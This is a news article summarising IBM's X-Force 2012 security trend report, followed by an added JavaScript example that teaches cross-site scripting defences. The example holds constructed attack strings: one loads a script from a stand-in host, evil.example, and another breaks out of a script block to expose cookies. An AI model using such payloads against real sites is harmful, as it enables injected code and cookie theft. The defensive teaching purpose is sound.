IBM: Web Application Vulnerabilities Threaten The Enterprise

By | April 03, 2013

Posted in: Network Security Trends

Web application vulnerabilities remained one of enterprises' most pressing issues, rising 14% in 2012 over 2011 year-end numbers, according to a recent report.

These vulnerabilities were exploited by attackers who, more often than not, injected malicious scripts and executables into legitimate websites and used them to target client-side vulnerabilities in browsers such as Internet Explorer and in plugins such as Java, the report found.

This topped the long list of findings of the IBM X-Force 2012 Annual Trend and Risk Report, a nearly 100-page dispatch highlighting the annual work of IBM’s security team. They culled information from a variety of resources, including their database of more than 70,000 computer security vulnerabilities, a global Web crawler and their international spam collectors to present a comprehensive look at the “year in global security threats.”

Leslie Horacek, IBM X-Force Threat Response Manager, said in a blog post unveiling the findings that attackers were getting more bang for their exploit-development buck by targeting cross-platform vulnerabilities, which let a single exploit work against many operating systems and browsers at once.

"Looking back over the year, there was a measurable increase in the public announcements of security incidents and breaches, where SQL injection and DDoS attacks continued to wreak havoc on IT infrastructures," she wrote. "Over the past year the discovery of sophisticated toolkits with ominous names like Flame to cross-platform zero-day vulnerabilities had both consumers and corporations inundated with advisories and alerts regarding emerging threats. The frequency of data breaches and incidents -- which had already hit a new high in 2011 -- continued its upward trajectory."

Going all the way back to the middle of last year, the Distributed Denial of Service (DDoS) attack has been generating headlines, culminating in last week's mammoth Spamhaus episode.

IBM's report showed that these attacks continue to grow, with denial-of-service traffic volumes reaching 60 to 70 Gbps. That surge is driven by compromised high-bandwidth web servers rather than home PCs: a handful of hijacked servers on data-center links can generate far more traffic than a botnet of consumer machines.

Another buzzword from 2012, the advanced persistent threat (APT), proved to be a bit of an enigma. IBM's team found that these persistent threats were often not so advanced at all.

"While media headlines are dominated by the achievements of suspected state-sponsored groups and advanced tactics used to breach high profile organizations, more often than not, these efforts follow a path of least resistance and rely on simpler, tried-and-true methods rather than zero-day attacks and sophisticated malware," wrote Horacek in the blog post. "Advanced persistent threats, while persistent, did not always use advanced technical approaches such as zero-day exploits and self-modifying malware."

Some additional key findings:

The US was the land of the breach: The United States had the most breaches, at 46%. The United Kingdom was second at 8% of total incidents, with Australia and India tied for third at 3%.

Spam holds steady: Spam volume remained nearly flat in 2012. India remains the top country for distributing spam, sending out more than 20 percent of all spam in the autumn of 2012. Following India was the United States, where more than 8 percent of all spam was generated in the second half of the year.

Vulnerabilities on the rise: 2012 saw 8,168 publicly disclosed vulnerabilities, an increase of over 14 percent over 2011. Web application vulnerabilities grew from 2,921 in 2011 to 3,551 in 2012 (the report describes this as a 14 percent rise, though those two figures work out to roughly 22 percent). Cross-site scripting vulnerabilities accounted for 53 percent of all web application vulnerabilities disclosed in 2012. There were 3,436 public exploits in 2012, about 42 percent of the total number of vulnerabilities, up 4 percent from 2011 levels.

Social media interconnection plagues the enterprise: Social media lets attackers view an enterprise as a collection of identifiable people rather than as infrastructure or applications, and to aim at specific individuals accordingly. Those individuals can be approached through their personal lives as well as their jobs, so an employee's personal online activity becomes a way into the enterprise.

Mobile will be just...fine: The IBM security team predicts that, based on security measures already undertaken, mobile computing devices should be more secure than traditional user computing devices by 2014.
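The cross-site scripting figure in the vulnerabilities finding above is the one number in this list a web developer can act on directly, and it is the same class of flaw that lets attackers plant scripts on legitimate sites as described earlier. The following JavaScript is an added example, not code from the IBM report or from this article: it shows the flaw in two output contexts (an HTML body and a `<script>` block), a hardened render beside each, and why the fix for the first context does not carry over to the second. The attacker inputs are constructed for the demonstration and the host evil.example is hypothetical.

```javascript
// Added example, not code from the IBM report or from this article. It shows the
// vulnerability class behind the 53 percent figure (cross-site scripting) in two
// output contexts, and why the fix for one context does not carry over to the other.
// All inputs below are constructed; the exploit host "evil.example" is hypothetical.

// Constructed attacker input: a "comment" posted to a legitimate site. Once stored
// and rendered unescaped, every visitor's browser runs the attacker's script, which
// is how compromised legitimate sites seed browser and plugin exploits.
const attackerComment =
  '<img src=x onerror="var s=document.createElement(\'script\');' +
  's.src=\'//evil.example/drop.js\';document.body.appendChild(s)">';

// Constructed attacker input aimed at a value reflected inside a <script> block.
// The trailing "//" comments out whatever the template appends after the value.
const scriptBreakout = '</script><script>alert(document.cookie)//';

// --- Context 1: HTML body --------------------------------------------------

// Vulnerable: untrusted text concatenated straight into HTML.
function renderCommentUnsafe(author, body) {
  return `<div class="comment"><b>${author}</b>: ${body}</div>`;
}

// Encoder for HTML body and double-quoted attribute contexts only.
function escapeHtml(value) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;' };
  return String(value).replace(/[&<>"']/g, (ch) => map[ch]);
}

// Hardened: every untrusted value is encoded for the context it lands in.
function renderCommentSafe(author, body) {
  return `<div class="comment"><b>${escapeHtml(author)}</b>: ${escapeHtml(body)}</div>`;
}

// Check: count start tags in the output. The template contributes exactly two
// (<div> and <b>); any extra tag came from attacker-controlled data.
function countStartTags(html) {
  return (html.match(/<[a-zA-Z]/g) || []).length;
}

// --- Context 2: inside a <script> element --------------------------------

// Vulnerable: a value dropped into a JavaScript string literal. HTML-escaping
// would not help here: the HTML parser ends the <script> element at the first
// literal "</script>" regardless of JavaScript quoting, and entity-encoding the
// value would leave "&lt;" in the script text, since script content is not decoded.
function embedInScriptUnsafe(value) {
  return `<script>var greeting = "${value}";</script>`;
}

// JavaScript-literal encoder: JSON.stringify handles quotes and backslashes, and
// the extra replacements keep "<", ">" and "&" out of the markup so "</script>"
// can never appear literally. The result is still a valid JS (and JSON) string.
function safeJsStringLiteral(value) {
  return JSON.stringify(String(value))
    .replace(/</g, '\\u003c')
    .replace(/>/g, '\\u003e')
    .replace(/&/g, '\\u0026');
}

function embedInScriptSafe(value) {
  return `<script>var greeting = ${safeJsStringLiteral(value)};</script>`;
}

// Check: count literal "</script>" occurrences; a safe render has exactly one,
// the closing tag supplied by the template.
function countScriptCloses(html) {
  return html.split('</script>').length - 1;
}

// Stand-alone demonstration.
console.log(countStartTags(renderCommentUnsafe('alice', attackerComment)), 'start tags (unsafe)'); // 3
console.log(countStartTags(renderCommentSafe('alice', attackerComment)), 'start tags (safe)');     // 2
console.log(countScriptCloses(embedInScriptUnsafe(scriptBreakout)), '</script> closes (unsafe)');  // 2
console.log(countScriptCloses(embedInScriptSafe(scriptBreakout)), '</script> closes (safe)');      // 1
```

The two counters are deliberately crude checks for the demonstration, not a general XSS detector; the point they make is that the encoder must match the context the data lands in. `escapeHtml` is right for element content and quoted attributes, `safeJsStringLiteral` for a value inside a script, and neither is a substitute for the other.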

The IBM team singled out "insider threats" as one of the more impactful issues facing the enterprise, citing a joint IBM/Ponemon study of C-level executives that identified negligent insiders as the greatest risk to sensitive data.

The report suggests that by employing access governance and security information and event management (SIEM) solutions, the enterprise can better monitor and control user access activities, identify anomalies and misuse of assets, and demonstrate compliance in the new perimeter-less workplace.

A full copy of the report can be downloaded HERE.
